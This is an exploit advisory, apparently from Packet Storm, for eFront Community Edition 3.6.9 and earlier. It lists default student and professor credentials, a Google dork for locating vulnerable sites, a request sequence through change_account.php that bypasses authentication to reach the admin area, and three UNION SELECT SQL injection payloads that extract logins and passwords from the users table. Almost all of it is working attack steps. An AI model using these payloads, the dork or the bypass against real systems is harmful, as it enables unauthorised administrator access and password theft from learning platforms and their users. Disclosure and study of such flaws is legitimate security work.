eFront versions 3.6.9 and below suffer from remote SQL injection, authentication bypass, and default credential vulnerabilities.
aefe030445dc4bcb2dfa045d31d290d0aa40a079be3b8cf12a26783b16de5e9c# Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
# Google Dork: "eFront (version 3.6.9)" inurl:index.php?ctg=*
# Date: 5/09/2011
# Public release: When 3.6.10 will be released
# Author: IHTeam
# Software Link: http://www.efrontlearning.net/download/download-efront.html
# Tested on: efront_3.6.9_build11018
# Original Advisory: http://iht.li/FWh
# Advisory code: http://iht.li/p/0VV
Default username and password:
student:student
professor:professor
How to become admin:
Request 1: /change_account.php?login=admin
Request 2: /userpage.php
OR
simple use the [Switch account] option on top of the page;
Now you are in admin area;
SQL Injection:
www/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed